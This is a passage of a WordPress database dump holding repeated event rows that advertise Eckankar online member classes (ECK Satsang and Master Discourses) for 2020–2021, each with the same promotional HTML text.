Satsang Discourses – Third Series\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The ECK Satsang Discourses – Third Series','','publish','closed','closed','','online-member-class-the-eck-satsang-discourses-third-series-2021-09-12','','','2020-12-09 11:14:03','2020-12-09 18:14:03','',262881,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-09-12#038;p=262881',0,'tribe_events','',0),(262892,2,'2020-12-09 11:14:03','2020-12-09 18:14:03','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Satsang Discourses – Third Series\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The ECK Satsang Discourses – Third Series','','publish','closed','closed','','online-member-class-the-eck-satsang-discourses-third-series-2021-10-10','','','2020-12-09 11:14:03','2020-12-09 18:14:03','',262881,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-10-10#038;p=262881',0,'tribe_events','',0),(262893,2,'2020-12-09 11:17:22','2020-12-09 18:17:22','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 2 Discourses\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The Master 2 Discourses','','publish','closed','closed','','online-member-class-the-master-2-discourses','','','2020-12-09 11:17:22','2020-12-09 18:17:22','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=262893',0,'tribe_events','',0),(262895,2,'2020-12-09 11:17:22','2020-12-09 18:17:22','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 2 Discourses\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The Master 2 Discourses','','publish','closed','closed','','online-member-class-the-master-2-discourses-2021-01-14','','','2020-12-09 11:17:22','2020-12-09 18:17:22','',262893,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-01-14#038;p=262893',0,'tribe_events','',0),(262896,2,'2020-12-09 11:17:22','2020-12-09 18:17:22','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 2 Discourses\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The Master 2 Discourses','','publish','closed','closed','','online-member-class-the-master-2-discourses-2021-02-11','','','2020-12-09 11:17:22','2020-12-09 18:17:22','',262893,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-02-11#038;p=262893',0,'tribe_events','',0),(262897,2,'2020-12-09 11:17:22','2020-12-09 18:17:22','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 2 Discourses\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The Master 2 Discourses','','publish','closed','closed','','online-member-class-the-master-2-discourses-2021-03-11','','','2020-12-09 11:17:22','2020-12-09 18:17:22','',262893,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-03-11#038;p=262893',0,'tribe_events','',0),(262898,2,'2020-12-09 11:17:22','2020-12-09 18:17:22','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 2 Discourses\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The Master 2 Discourses','','publish','closed','closed','','online-member-class-the-master-2-discourses-2021-04-08','','','2020-12-09 11:17:22','2020-12-09 18:17:22','',262893,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-04-08#038;p=262893',0,'tribe_events','',0),(262899,2,'2020-12-09 11:17:22','2020-12-09 18:17:22','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 2 Discourses\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The Master 2 Discourses','','publish','closed','closed','','online-member-class-the-master-2-discourses-2021-05-13','','','2020-12-09 11:17:22','2020-12-09 18:17:22','',262893,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-05-13#038;p=262893',0,'tribe_events','',0),(262900,2,'2020-12-09 11:17:22','2020-12-09 18:17:22','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 2 Discourses\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The Master 2 Discourses','','publish','closed','closed','','online-member-class-the-master-2-discourses-2021-06-10','','','2020-12-09 11:17:22','2020-12-09 18:17:22','',262893,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-06-10#038;p=262893',0,'tribe_events','',0),(262901,2,'2020-12-09 11:17:22','2020-12-09 18:17:22','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 2 Discourses\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The Master 2 Discourses','','publish','closed','closed','','online-member-class-the-master-2-discourses-2021-07-08','','','2020-12-09 11:17:22','2020-12-09 18:17:22','',262893,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-07-08#038;p=262893',0,'tribe_events','',0),(262902,2,'2020-12-09 11:17:22','2020-12-09 18:17:22','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 2 Discourses\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The Master 2 Discourses','','publish','closed','closed','','online-member-class-the-master-2-discourses-2021-08-12','','','2020-12-09 11:17:22','2020-12-09 18:17:22','',262893,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-08-12#038;p=262893',0,'tribe_events','',0),(262903,2,'2020-12-09 11:17:22','2020-12-09 18:17:22','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 2 Discourses\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The Master 2 Discourses','','publish','closed','closed','','online-member-class-the-master-2-discourses-2021-09-09','','','2020-12-09 11:17:22','2020-12-09 18:17:22','',262893,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-09-09#038;p=262893',0,'tribe_events','',0),(262904,2,'2020-12-09 11:17:22','2020-12-09 18:17:22','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 2 Discourses\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The Master 2 Discourses','','publish','closed','closed','','online-member-class-the-master-2-discourses-2021-10-14','','','2020-12-09 11:17:22','2020-12-09 18:17:22','',262893,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-10-14#038;p=262893',0,'tribe_events','',0),(262905,2,'2020-12-09 11:20:09','2020-12-09 18:20:09','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 2 Discourses\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class – The Master 2 Discourses','','publish','closed','closed','','online-member-class-the-master-2-discourses-2','','','2020-12-09 20:27:21','2020-12-10 03:27:21','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=262905',0,'tribe_events','',0),(262907,2,'2020-12-09 11:22:48','2020-12-09 18:22:48','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 4 Discourses\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class – The Master 4 Discourses','','publish','closed','closed','','online-member-class-the-master-4-discourses','','','2020-12-09 11:37:55','2020-12-09 18:37:55','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=262907',0,'tribe_events','',0),(262909,2,'2020-12-09 11:22:48','2020-12-09 18:22:48','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 4 Discourses\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class – The Master 4 Discourses','','publish','closed','closed','','online-member-class-the-master-4-discourses-2021-01-03','','','2020-12-09 11:37:55','2020-12-09 18:37:55','',262907,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-01-03#038;p=262907',0,'tribe_events','',0),(262910,2,'2020-12-09 11:22:48','2020-12-09 18:22:48','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 4 Discourses\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class – The Master 4 Discourses','','publish','closed','closed','','online-member-class-the-master-4-discourses-2021-02-07','','','2020-12-09 11:37:55','2020-12-09 18:37:55','',262907,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-02-07#038;p=262907',0,'tribe_events','',0),(262911,2,'2020-12-09 11:22:48','2020-12-09 18:22:48','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 4 Discourses\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class – The Master 4 Discourses','','publish','closed','closed','','online-member-class-the-master-4-discourses-2021-03-07','','','2020-12-09 11:37:55','2020-12-09 18:37:55','',262907,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-03-07#038;p=262907',0,'tribe_events','',0),(262912,2,'2020-12-09 11:22:48','2020-12-09 18:22:48','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 4 Discourses\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class – The Master 4 Discourses','','publish','closed','closed','','online-member-class-the-master-4-discourses-2021-04-04','','','2020-12-09 11:37:55','2020-12-09 18:37:55','',262907,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-04-04#038;p=262907',0,'tribe_events','',0),(262913,2,'2020-12-09 11:22:48','2020-12-09 18:22:48','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 4 Discourses\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class – The Master 4 Discourses','','publish','closed','closed','','online-member-class-the-master-4-discourses-2021-05-02','','','2020-12-09 11:37:55','2020-12-09 18:37:55','',262907,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-05-02#038;p=262907',0,'tribe_events','',0),(262914,2,'2020-12-09 11:22:48','2020-12-09 18:22:48','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 4 Discourses\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class – The Master 4 Discourses','','publish','closed','closed','','online-member-class-the-master-4-discourses-2021-06-06','','','2020-12-09 11:37:55','2020-12-09 